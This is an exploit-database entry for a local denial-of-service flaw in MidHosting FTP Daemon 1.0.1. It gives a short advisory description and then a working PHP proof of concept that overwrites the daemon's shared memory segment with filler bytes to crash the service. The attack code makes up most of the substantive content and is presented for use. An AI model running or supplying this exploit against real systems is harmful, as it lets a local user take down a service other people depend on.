MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service
| EKU-ID: 28267 | CVE: OSVDB-2182 | OSVDB-ID: |
| Author: Frank DENIS | Published: 2003-06-18 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28267 | CVE: OSVDB-2182 | OSVDB-ID: |
| Author: Frank DENIS | Published: 2003-06-18 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7956/info
It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash.
<?php
# mhftpd denial of service
define('SHMSIZE', 16384);
if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);
?>